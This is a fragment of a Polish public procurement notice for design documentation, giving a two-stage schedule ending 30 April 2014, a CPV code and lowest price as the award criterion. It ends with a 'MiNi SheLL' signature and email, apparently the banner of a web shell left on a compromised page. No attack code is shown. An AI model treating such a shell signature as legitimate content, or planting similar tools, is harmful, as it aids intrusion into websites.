Zatwierdzenie dokumentacji nastąpi dwuetapowo:
ETAP 1 -  opracowanie koncepcji projektowej - czas wykonania do 1 miesiąca od daty podpisania umowy
ETAP 2 - po zaakceptowaniu przez Zamawiającego koncepcji wykonanie docelowego projektu - czas wykonania do 30 kwietnia 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com